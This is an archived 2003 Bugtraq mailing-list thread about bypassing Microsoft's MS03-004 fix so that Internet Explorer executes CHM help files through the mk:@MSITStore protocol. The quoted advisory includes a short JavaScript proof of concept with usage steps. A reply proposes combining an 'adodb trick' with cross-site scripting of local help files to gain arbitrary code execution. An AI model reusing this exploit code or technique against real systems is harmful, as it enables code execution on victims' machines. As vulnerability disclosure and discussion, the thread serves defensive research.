<<< Date Index >>>     <<< Thread Index >>>

Re: IE: CHM Attacks are still alive (CHM attack without showHelp())



Arman,

I tried this and set up a test with your code at
http://ip3e83566f.speed.planet.nl/iran.htm
It does nothing on my patched IE6 SP1 where where you testing on ?
IE6 SP1 by default disallows access to local recources so this is exactly
what it should do.
As andreas pointed out, if you are using a different  version of IE that
doesn't do this, there is no risk as its not opened inside the help viewer
It seems to me this is a non-issue.

Andreas,

Correct but I thought about it, and the adodb trick I posted about on full
disclosure
(http://www.mail-archive.com/full-disclosure@xxxxxxxxxxxxxxxx/msg06847.html 
) can most likely be used

since help files are located on the local filesystem and are opened in the
local zone this should work I attached a test file that suggests that it
probably would.
This means you can get arbitrary execution of code if you somehow manage to
xss a local chm file

241 CHM files in my c:\windows\help , have fun


----- Original Message ----- 
From: "Andreas Sandblad" <sandblad@xxxxxxxxxx>
To: "Arman Nayyeri" <arman-n@xxxxxxxxxxxx>
Cc: <bugtraq@xxxxxxxxxxxxxxxxx>
Sent: Thursday, September 04, 2003 9:27 AM
Subject: Re: IE: CHM Attacks are still alive (CHM attack without showHelp())


> In order to use the shortcut command your code must be launched
> in HTML Help. Simply linking to contents inside a chm file with the
> mk: protocol will not do the trick since you are still operating inside
> IE. That is the reason why you didn't get the chm file to execute
> programs using the shortcut command.
>
> I believe MS successfully secured showHelp(...) to stop various attacks
> using the shortcut command (including Sandblad #10).
>
> /Andreas Sandblad
>
> On Tue, 2 Sep 2003, Arman Nayyeri wrote:
>
> >
> >
> >                               !! R/\/\an#0001 !!
> >
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> >
> > CHM Attacks are still alive
> > ===========================
> > Title:    CHM Attacks are still alive
> > Date:     Tuesday, September 02, 2003
> > Software: IE (What a nice program!!!)
> > Vendor:   Microsoft Corp. (I love Microsoft)
> > Patch:    N/A
> > Author:   Arman Nayyeri, arman-n@xxxxxxxxxxxx
> >
> >
> > Vendor Status:
> > ==============
> > Microsoft was not contacted, because I don't know email address of
> > Microsoft.
> >
> >
> > Description:
> > ============
> >
> > After releasing MS03-004 patch, it is still possible to execute a chm
file
> > without using of showHelp() command.
> > We can use mk:@MSITStore to execute CHM files, but with some tricks.
> >
> > 1.first we must have an help window opened in order to chm file to work
> > correctly.
> >
> > 2.We must open a window (or an iframe) that points to
> > mk:@MSITStore:pathof.chm::/compiledhtmlfilewithinchm.html
> >
> > The first one is hard but easy with the help of the user.
> > We can say to user to press F1 key then by using a onkeydown event go to
> > step 2.
> > As easy as this!!!!!
> > The microsoft patch just stop showHelp() functionality but it is still
> > possible.
> > If you use a url for chm file ,it will open and show the content of file
> > but do not execute programs without generating any errors. (I test it on
> > one chm file ,you can try more, maybe its worked!)
> > But in the case of sandblad #11 ,I can't produce it without showHelp(),
> > and I need the help of Andreas.
> > Andreas!, I believe that it will work, so try it!!.
> >
> > Exploit
> > =======
> > As you can see, here is the simple javascript code that I write to
exploit
> > this.
> > you must:
> > 1.make a chm file and save it as c:\msit.chm (download free tool for
> > making a chm file from http://go.microsoft.com/fwlink/?LinkId=14188 )
> > 2.remove all ! from script
> > 3.create a html file and copy the code into that
> > 4.open the html page and press F1 key (at the top left corner of your
> > keyboard)
> > (you may need to increase Timeout to allow the IE help to be opened)
> >
> > -------------------------------BEGINING OF
FILE---------------------------
> > <!h2>You should press "F1" key (at the top left corner of your keyboard)
> > </h2>
> > <!script>
> > function gotKey(){
> > if (event.keyCode==112){
> > setTimeout(
> > function () {
> >    document.write('<iframe id=I1
> > src="mk:@MSITStore:c:\\msit.chm::/page.html"></'+'iframe><br><h3>I Love
> > IRAN<br>R/\/\an#0001</h3>');
> > },
> > 1194
> > );
> > }
> > }
> > document.onkeydown = gotKey;
> > <!/script>
> > ---------------------------------END OF
FILE------------------------------
> >
> >
> > Disclaimer:
> > ===========
> > Arman Nayyeri is not responsible for the misuse of the information
> > provided in this advisory. The opinions expressed are my own and not of
> > any company. In no event shall the author be liable for any damages
> > whatsoever arising out of or in connection with the use or spread of
this
> > advisory. Any use of the information is at the user's own risk.
> >
> >
> > Please Contact Me:
> > ==================
> > arman-n@xxxxxxxxxxxx
> >
> >
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > Arman Nayyeri
> > MCP, MCSE 2000(in next two weeks)
> >
> > Semnan, IRAN (IRAN IS MY COUNTRY, I LOVE IRAN!!!)
> >
>
> -- 
>     _     _
>   o' \,=./ `o
>      (o o)
> -ooO--(_)--Ooo-

Attachment: testing.zip
Description: Binary data